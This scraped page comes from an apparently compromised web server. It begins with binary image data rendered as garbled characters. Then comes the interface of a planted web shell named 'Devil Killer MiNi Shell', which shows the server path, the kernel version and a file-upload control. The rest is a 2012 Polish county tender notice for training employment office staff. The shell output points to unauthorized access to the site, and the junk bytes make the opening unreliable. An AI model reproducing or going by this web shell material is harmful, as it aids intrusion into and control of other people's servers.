JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120911/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120911/341962-N-2012.html

<p class="kh_header"><b>Końskie: Przetarg nieograniczony na organizację i przeprowadzenie szkoleń dla pracowników Powiatowego Urzędu Pracy w Końskich w ramach projektu Profesjonalna kadra.</b><br>
<b>Numer ogłoszenia: 341962 - 2012; data zamieszczenia: 11.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Konecki , ul. Staszica 2, 26-200 Końskie, woj. świętokrzyskie, tel. 0-41 372 41 34, faks 0-41 372 83 20.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.konskie.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na organizację i przeprowadzenie szkoleń dla pracowników Powiatowego Urzędu Pracy w Końskich w ramach projektu Profesjonalna kadra..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkoleń oraz ich techniczna organizacja dla pracowników Powiatowego Urzędu Pracy w Końskich w ramach projektu Profesjonalna kadra  współfinansowanego środkami Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.

ZADANIE 1.
Temat szkolenia : Pośrednictwo pracy - nowe wyzwania w związku ze zmianami                          w rozporządzeniu w sprawie standardów i warunków prowadzenia usług rynku pracy - szkolenie otwarte.

Cel szkolenia : 

Nabycie wiedzy z zakresu prowadzenia pośrednictwa pracy w świetle  nowych standardów , nabycie praktycznych umiejętności z zakresu stosowania przepisów zmieniających rozporządzenie w sprawie standardów i warunków prowadzenia usług rynku pracy, poznanie obowiązujących procedur                         i dokumentacji.

Program szkolenia :

1.	Omówienie zmian -  stare i  nowe  przepisy prawne regulujące świadczenie usług rynku pracy.
2.	Nowe procedury prowadzenia pośrednictwa pracy - cele wprowadzonych zmian.
3.	Nowoczesne metody i formy prowadzenia pośrednictwa pracy.
4.	Zmiany w obowiązującej dokumentacji.
5.	Nawiązywanie i podtrzymywanie kontaktów z pracodawcami.
6.	Współpraca z pracodawcą - zmiany.
7.	Podejmowanie i utrzymywanie kontaktu z osobami bezrobotnymi.
Liczba uczestników szkolenia 		-	3 osoby.
Liczba godzin dydaktycznych 		-	25 - 30  h.
Czas trwania szkolenia 			-	4 - 5   dni.
Termin realizacji szkolenia 		-	październik - grudzień 2012 r.

ZADANIE 2.
Temat szkolenia : Efektywna współpraca pośrednika pracy                                                                  z pracodawcami, dokumentowanie ścieżki aktywizacji, Indywidualny Plan Działania - szkolenie otwarte.

Cel szkolenia : 

Poznanie podstaw prawnych współpracy pośrednika z pracodawcami, jak i zadań jakie przed nim stoją. Sposoby pozyskiwania jak i realizacji ofert pracy. Zdobycie nowych pomysłów i rozwiązań na rzecz współpracy z pracodawcami, na sprawne  i profesjonalne przygotowanie ścieżki aktywizacji klienta i IPD.

Program szkolenia :

1.	Współpraca z pracodawcami w świetle przepisów prawnych.
2.	Segmentacja pracodawców w aspekcie różnych kryteriów.
3.	Tworzenie baz danych pracodawców.
4.	Kontakty pośrednika z pracodawcami - efektywne pozyskiwanie pracodawców do współpracy          ( rozpoznawanie potrzeb lokalnego rynku pracy, określanie celu i zasad współpracy, planowanie pracy pośrednika w obszarze lokalnych pracodawców, prowadzenie współpracy z pracodawcami - ustalanie potrzeb, oferowanie różnych form  pomocy).
5.	Formy i metody współpracy pośrednika pracy z pracodawcami.
6.	Pomoc pracodawcom w doborze kandydatów do pracy ( formy pomocy, imprezy promujące usługi urzędu, rodzaje i sposoby pozyskiwania ofert pracy, przyjmowanie, ustalanie warunków realizacji i realizacja ofert pracy - dokumentacja, współpraca z innymi specjalistami urzędu pracy w zakresie realizacji ofert pracy i potrzeb pracodawców ).
7.	Segmentacja i aktywizacja osób zarejestrowanych w PUP - ścieżka aktywizacji.
8.	Indywidualny Plan Działania.

Liczba uczestników szkolenia 		-	3 osoby.
Liczba godzin dydaktycznych 		-	25 - 30 h.
Czas trwania szkolenia 			-	4 - 5 dni.
Termin realizacji szkolenia 		-	październik   - grudzień 2012 r.

ZADANIE 3.
Temat szkolenia : Kurs inspiracji - szkolenie otwarte.

Cel szkolenia :

Kompleksowe zapoznanie się z metodą Kursu Inspiracji, jej aspektami teoretycznymi oraz praktycznymi. Uzyskanie wiedzy z zakresu metodologii Kursu inspiracji oraz umiejętności zastosowania tej metody i jej narzędzi w praktyce,  w pracy ze swoimi klientami. Nabycie umiejętności prowadzenia grupowego doradztwa zawodowego z wykorzystaniem metod i technik stosowanych w Kursie inspiracji.

Program szkolenia :

1.	Warunki organizacyjne i założenia teoretyczne Kursu inspiracji.
2.	Kształcenie ustawiczne i pedagogika oparta na doświadczeniu.
3.	Zmiana społeczna jako źródło rozwoju.
4.	Psychologiczne oddziaływanie bezrobocia.
5.	Problemy tożsamości i wartości oraz zainteresowania.
6.	Analiza transakcyjna.
7.	Identyfikacja postaw i rodzaje transakcji.
8.	Techniki komunikacji i ich konsekwencje, asertywność.
9.	Wyrażanie pozytywnych postaw wobec innych.
10.	Plan działania - określanie celów i tworzenie indywidualnego planu działania.
11.	Poszukiwanie rozwiązań odnoszących się do określonych problemów, kuźnia przyszłości, pozytywne myślenie.
12.	Funkcje ewaluacji w poradnictwie grupowym.



Liczba uczestników szkolenia 		-	1 osoba.
Liczba godzin dydaktycznych 		-	20 - 25 h.
Czas trwania szkolenia 			-	3 - 4  dni.
Termin realizacji szkolenia 		-	październik   - grudzień 2012 r.

I.	Metody i techniki jakie wykonawca ma obowiązek zastosować podczas szkolenia                   ( dotyczy zadań : 1,2,3 ) :
- wykłady - podczas których nastąpi werbalna prezentacja tematu przez prowadzącego szkolenie przy wykorzystaniu rzutnika multimedialnego, ekranu, tablicy flip chart ;
- warsztaty - na których materiał poznany na wykładach zostanie lepiej przyswojony przez uczestników szkolenia, zaś opanowane techniki zostaną wdrożone  w przyszły system pracy z bezrobotnym;
- dyskusje, konsultacje - dzięki którym, zaistnieje możliwość  uszczegółowienia uzyskanych informacji.

II.	Kwestie organizacyjne dotyczące poszczególnych zadań :

a)	Wykonawca obowiązany jest zorganizować szkolenie w pełnym zakresie tj. :            
 - zapewnić transport  uczestnikom szkolenia wraz z posiadanymi przez nich bagażami                       z miejsca wyznaczonego przez Zamawiającego do miejsca szkolenia  i z powrotem, ewentualnie w cenę szkolenia Wykonawca musi wliczyć koszty dojazdu z  na szkolenie ;
- zakwaterowanie wraz z noclegiem dla uczestników szkolenia;
- pełne wyżywienie dla  uczestników szkolenia.
b)	Zajęcia muszą być prowadzone w salach szkoleniowych zlokalizowanych                                                w hotelach o standardzie minimum 3 - gwiazdkowym lub w ośrodkach konferencyjno - szkoleniowych  odpowiadających standardem hotelowi 3- gwiazdkowemu  - zgodnie                   z przepisami bezpieczeństwa i higieny pracy.
c)	Sala do prowadzenia zajęć musi być klimatyzowana z odpowiednią wizualizacją                       ( logo PO KL i logotyp Unii Europejskiej dwanaście złotych pięcioramiennych gwiazd na błękitnym tle z odwołaniem słownym do Unii Europejskiej                                                             i Europejskiego Funduszu Społecznego , Wykonawca musi ponadto zamieścić informację               o realizowaniu projektu współfinansowanego ze środków Unii Europejskiej  w ramach Europejskiego Funduszu Społecznego), wyposażona w rzutnik do prezentacji multimedialnej, laptopa oraz tablicę  flip chart.
d)	Wykonawca zobowiązany jest zapewnić wyżywienie dla każdego uczestnika szkolenia podczas każdego dnia , w którym będą odbywać się zajęcia szkoleniowe. Wyżywienie musi obejmować:
- co najmniej 2 przerwy kawowe dziennie ( kawa , herbata, napoje niegazowane, soki owocowe - 2 rodzaje, woda, ciastka deserowe).
- śniadania i kolacje.
- obiad składający się z minimum dwóch dań tj. zupy , dania głównego i deseru . Podczas obiadu należy zapewnić również herbatę, kawę, wodę i soki owocowe    -       2 rodzaje.
Miejsce wydawania posiłków powinno znajdować się w tym samym obiekcie ,                                  w którym prowadzone będą szkolenia przy czym niedopuszczalne jest, aby posiłki serwowano w ramach jednego pomieszczenia, w którym będzie odbywać się szkolenie.
e)	Wykonawca jest bezpośrednio odpowiedzialny za przygotowanie , przeprowadzenie i obsługę szkolenia, zapewnienie materiałów dydaktycznych oraz pomocy szkoleniowych, zapewnienie trenerów szkoleń i osoby będącej koordynatorem szkolenia. Osoba wyznaczona w tym celu przez Wykonawcę musi przebywać ( przez cały okres trwania szkolenia) w miejscu odbywania zajęć w celu zapewnienia prawidłowej organizacji zajęć i powinna dysponować numerem telefonu kontaktowego.
f)	Szkolenia nie muszą się odbywać w tych samych miejscowościach. Miejsca poszczególnych szkoleń muszą być usytuowane w odległości nie bliższej niż 50 km i nie dalszej niż 300 km od granicy administracyjnej miasta Końskie.
g)	W przypadku braku możliwości dojazdu uczestników na miejsce szkolenia w dniu rozpoczęcia szkolenia Wykonawca zapewni nocleg zgodny z powyższym opisem oraz kolację w przeddzień szkolenia i śniadanie w dniu rozpoczęcia szkolenia. Ostatni dzień szkolenia musi zakończyć się w godzinach umożliwiających powrót uczestników szkolenia do miejsca zamieszkania w dniu zakończenia szkolenia.
h)	Wykonawca winien zapewnić ubezpieczenie od następstw nieszczęśliwych wypadków NNW dla wszystkich uczestników szkoleń od pierwszego do ostatniego dnia szkolenia.
i)	Wykonawca musi zapewnić dla każdego uczestnika na własność szkolenia następujące materiały biurowe: 
- notatnik 100- kartkowy w kratkę w formacie A4  -  opatrzony logo PO KL                                      i logotypem Unii Europejskiej i informacją  o realizowaniu projektu współfinansowanego ze środków Unii Europejskiej  w ramach Europejskiego Funduszu Społecznego;
- długopis automatyczny z wymiennym metalowym wkładem z niebieskim tuszem;
 - zestaw 4 długopisów żelowych w kolorach wkładu: czarnym, niebieskim, czerwonym                      i zielonym;
- zakreślacz;
- teczkę A4 zamykaną na suwak z Eko skóry ,grzbiet do 25 mm, wyposażoną                               w kieszeń zamykaną na suwak, kieszeń płaską, 4 kieszonki na wizytówki, kieszeń                     z okienkiem na wizytówki, miejscem na długopis i klipem do przytrzymywania notatnika -   opatrzoną logo PO KL i logotypem Unii Europejskiej i informacją    o realizowaniu projektu współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
j)     Wykonawca musi zapewnić dla każdego uczestnika szkolenia materiały szkoleniowe w formie skryptów dla opisanego zakresu szkolenia objętego umową ze szczegółowym programem szkolenia ( wszystkie te materiały muszą być opatrzone logo PO KL i logotypem Unii Europejskiej  dwanaście złotych pięcioramiennych gwiazd na błękitnym tle z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Społecznego oraz informację                                                 o realizowaniu projektu współfinansowanego ze środków Unii Europejskiej                                      w ramach Europejskiego Funduszu Społecznego).
k)	Po zakończeniu szkolenia Wykonawca musi wydać uczestnikom szkoleń zaświadczenie potwierdzające udział w szkoleniu w oparciu o wzór zaświadczenia stanowiącym Załącznik nr 1 do Rozporządzenia Ministra Edukacji  i Nauki z dnia  3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych         w formach pozaszkolnych .
l)	Wykonawca zobowiązany jest udostępnić Zamawiającemu dokumenty związane                          z realizowanym Projektem, w tym dokumenty  finansowe , w terminie określonym przez  Zamawiającego.
 ł)   Wykonawca jest zobowiązany umożliwić Zamawiającemu oraz Wojewódzkiemu Urzędowi Pracy w Kielcach - Instytucji Wdrażającej ( Instytucji Pośredniczącej II stopnia), dokonanie kontroli w miejscach realizacji projektu.
m)	Wykonawca ma obowiązek prowadzić podczas szkoleń listę obecności uczestników szkolenia.
n)	Wykonawca ma obowiązek przeprowadzić wśród uczestników szkolenia ankietę dotyczącą jakości szkolenia . 
o)	Szkolenie musi być realizowane zgodnie z programem szkolenia. Zajęcia muszą odbywać się codziennie w dni powszednie w godzinach od 9:00 do 16:00.  Nie mogą odbywać się              w sobotę, niedzielę oraz w dni ustawowo wolne od pracy.
Zgodnie z przepisami dotyczącymi kształcenia dorosłych w formach pozaszkolnych program nauczania każdej formy kształcenia powinien zawierać :
1)	nazwę formy kształcenia;
2)	czas trwania i sposób jej organizacji;
3)	wymagania wstępne dla uczestników;
4)	cele kształcenia;
5)	plan nauczania określający nazwę zajęć edukacyjnych oraz ich wymiar;
6)	treści kształcenia w zakresie poszczególnych zajęć edukacyjnych;
7)	wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych;
8)	sposób sprawdzania efektów kształcenia.
p)	Szkolenie musi  być przeprowadzone przez odpowiednio wykwalifikowaną kadrę szkoleniową.
q)	Wykonawca ma obowiązek wszystkie dokumenty wymagane przez Zamawiającego oznaczyć logo PO KL i logotypem Unii Europejskiej dwanaście złotych pięcioramiennych gwiazd na błękitnym tle z odwołaniem słownym do Unii Europejskiej   i Europejskiego Funduszu Społecznego , ponadto Wykonawca musi  na żądanych dokumentach zamieścić informację     o realizowaniu projektu współfinansowanego ze środków Unii Europejskiej  w ramach Europejskiego Funduszu Społecznego  i przekazać te dokumenty Zamawiającemu :
- zaświadczenia o ukończeniu szkolenia w oparciu o wzór zaświadczenia stanowiącym Załącznik nr 1 do Rozporządzenia Ministra Edukacji i Nauki z dnia  3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych ;
- ankiety dotyczące jakości szkolenia ;
- listę obecności uczestników szkolenia;
- dziennik zajęć zgodny z programem szkolenia;
- potwierdzenie otrzymania materiałów dydaktycznych;
- imienny wykaz osób, które ukończyły szkolenie;
- fakturę za wykonane szkolenie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.51.10.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę  warunku posiadania wiedzy                           i doświadczenia , Zamawiający żąda :

- wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych , co najmniej 3 ( trzech ) usług w zakresie odpowiadającym przedmiotowi zamówienia t. j. usług szkoleniowych dla pośredników pracy i doradców  zawodowych o tej samej lub podobnej tematyce przedstawionej w opisie przedmiotu zamówienia ,  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę warunku dysponowania osobami zdolnymi do wykonania zamówienia, Zamawiający żąda :

- wykazu osób , które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług - 1 osoba.

Trenerem musi być osoba, która spełnia poniższe wymagania w zakresie wykształcenia                               i doświadczenia :
- posiadająca wykształcenie wyższe ;
- posiadająca  minimum 3-letnie doświadczenie jako trener  w prowadzeniu szkoleń dla pracowników Publicznych Służb Zatrudnienia ;
- przeprowadziła minimum 3 szkolenia w zakresie odpowiadającym przedmiotowi zamówienia                    t. j. usługi szkoleniowe o tej samej lub podobnej tematyce dla pośredników pracy i doradców zawodowych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.wykonawca do oferty dołącza dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania  oferty, np. aktualny odpis z właściwego rejestru, aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, aktualny statut spółki lub aktualny rejestr handlowy. Wymagane dokumenty można złożyć w formie kopii poświadczonej za zgodność z oryginałem przez wykonawcę.  Treść pełnomocnictwa musi jednoznacznie określać czynności, co do wykonywania których pełnomocnik jest upoważniony.
W przypadku złożenia  odpisu z właściwego rejestru lub zaświadczenia o wpisie do ewidencji działalności gospodarczej - dokument taki musi być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.zaakceptowany wzór umowy 
3.wzór dokumentu potwierdzającego ukończenie szkolenia oraz  wzór ankiety oceniającej szkolenie.
4.program szkolenia  
5.pisemne zobowiązanie osób biorących udział w wykonaniu zamówienia  zgodnie z art. 26 ust. 2b ustawy Prawo zamówień publicznych, dotyczy osób nie będących pracownikami Wykonawcy w myśl przepisów Kodeksu pracy, a będą osobami biorącymi udział w wykonaniu zamówienia .
6.harmonogram szkolenia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie wykonawcy w realizacji usług zgodnych z przedmiotem zamówienia - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.konskie.ibip.pl<br>
